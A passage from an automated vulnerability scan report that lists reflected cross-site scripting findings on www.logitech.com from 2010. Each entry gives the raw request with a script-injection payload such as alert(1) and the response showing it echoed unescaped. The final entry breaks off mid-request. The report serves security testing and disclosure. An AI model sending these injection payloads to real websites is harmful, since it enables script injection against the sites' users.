The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d16f0</script><script>alert(1)</script>de4a040ad2d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/349d16f0</script><script>alert(1)</script>de4a040ad2d/6072 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349d16f0</script><script>alert(1)</script>de4a040ad2d/6072' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.191. http://www.logitech.com/en-us/349/6072 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6072

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c067"><script>alert(1)</script>0ff74f39623 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/349/60723c067"><script>alert(1)</script>0ff74f39623 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="349/60723c067"><script>alert(1)</script>0ff74f39623">
...[SNIP]...

1.192. http://www.logitech.com/en-us/349/6072 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6072

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bc63</script><script>alert(1)</script>b178cbb70e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/349/60723bc63</script><script>alert(1)</script>b178cbb70e HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349/60723bc63</script><script>alert(1)</script>b178cbb70e' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.193. http://www.logitech.com/en-us/349/6775 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6775

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c707</script><script>alert(1)</script>33f9bdeee5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /9c707</script><script>alert(1)</script>33f9bdeee5a/349/6775 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','9c707</script><script>alert(1)</script>33f9bdeee5a/349/6775' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'D
...[SNIP]...

1.194. http://www.logitech.com/en-us/349/6775 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6775

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad825"><script>alert(1)</script>295434f427f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-usad825"><script>alert(1)</script>295434f427f/349/6775 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-usad825"><script>alert(1)</script>295434f427f/349/6775">
...[SNIP]...

1.195. http://www.logitech.com/en-us/349/6775 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/349/6775

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 168dd"%3b2d6279d6b62 was submitted in the REST URL parameter 1. This input was echoed as 168dd";2d6279d6b62 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us168dd"%3b2d6279d6b62/349/6775 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-us168dd";2d6279d6b62/349/6775";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.196. http://www.logitech.com/en-us/349/6775 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6775

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 606e9</script><script>alert(1)</script>815036778ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/349606e9</script><script>alert(1)</script>815036778ee/6775 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349606e9</script><script>alert(1)</script>815036778ee/6775' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.197. http://www.logitech.com/en-us/349/6775 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6775

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d057"><script>alert(1)</script>b8b89d6bd9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/3498d057"><script>alert(1)</script>b8b89d6bd9/6775 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="3498d057"><script>alert(1)</script>b8b89d6bd9/6775">
...[SNIP]...

1.198. http://www.logitech.com/en-us/349/6775 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6775

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e6e2</script><script>alert(1)</script>bb3b428b617 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/349/67757e6e2</script><script>alert(1)</script>bb3b428b617 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349/67757e6e2</script><script>alert(1)</script>bb3b428b617' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.199. http://www.logitech.com/en-us/349/6775 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6775

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ac07"><script>alert(1)</script>97157e42f5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/349/67759ac07"><script>alert(1)</script>97157e42f5 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="349/67759ac07"><script>alert(1)</script>97157e42f5">
...[SNIP]...

1.200. http://www.logitech.com/en-us/349/7073 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7073

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf44"><script>alert(1)</script>6b9841d87ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us3cf44"><script>alert(1)</script>6b9841d87ce/349/7073 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:52:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us3cf44"><script>alert(1)</script>6b9841d87ce/349/7073">
...[SNIP]...

1.201. http://www.logitech.com/en-us/349/7073 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/349/7073

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47f76"%3bfd7a8e7c391 was submitted in the REST URL parameter 1. This input was echoed as 47f76";fd7a8e7c391 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us47f76"%3bfd7a8e7c391/349/7073 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:52:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-us47f76";fd7a8e7c391/349/7073";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.202. http://www.logitech.com/en-us/349/7073 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7073

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92b52</script><script>alert(1)</script>a773f1bfa5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /92b52</script><script>alert(1)</script>a773f1bfa5/349/7073 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:52:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','92b52</script><script>alert(1)</script>a773f1bfa5/349/7073' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'D
...[SNIP]...

1.203. http://www.logitech.com/en-us/349/7073 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7073

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db199"><script>alert(1)</script>0ec9d835d4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/349db199"><script>alert(1)</script>0ec9d835d4e/7073 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:52:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="349db199"><script>alert(1)</script>0ec9d835d4e/7073">
...[SNIP]...

1.204. http://www.logitech.com/en-us/349/7073 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7073

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 716af</script><script>alert(1)</script>881478f03b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/349716af</script><script>alert(1)</script>881478f03b7/7073 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:52:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349716af</script><script>alert(1)</script>881478f03b7/7073' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.205. http://www.logitech.com/en-us/349/7073 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7073

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14603"><script>alert(1)</script>c056dd9fee1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/349/707314603"><script>alert(1)</script>c056dd9fee1 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:52:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="349/707314603"><script>alert(1)</script>c056dd9fee1">
...[SNIP]...

1.206. http://www.logitech.com/en-us/349/7073 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7073

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14687</script><script>alert(1)</script>59ccc27ac9c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/349/707314687</script><script>alert(1)</script>59ccc27ac9c HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:52:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349/707314687</script><script>alert(1)</script>59ccc27ac9c' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.207. http://www.logitech.com/en-us/349/7393 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/349/7393

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec795"%3bc8ac63c2a7f was submitted in the REST URL parameter 1. This input was echoed as ec795";c8ac63c2a7f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-usec795"%3bc8ac63c2a7f/349/7393 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-usec795";c8ac63c2a7f/349/7393";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.208. http://www.logitech.com/en-us/349/7393 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7393

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ee26"><script>alert(1)</script>6841bfbfbe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us2ee26"><script>alert(1)</script>6841bfbfbe4/349/7393 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
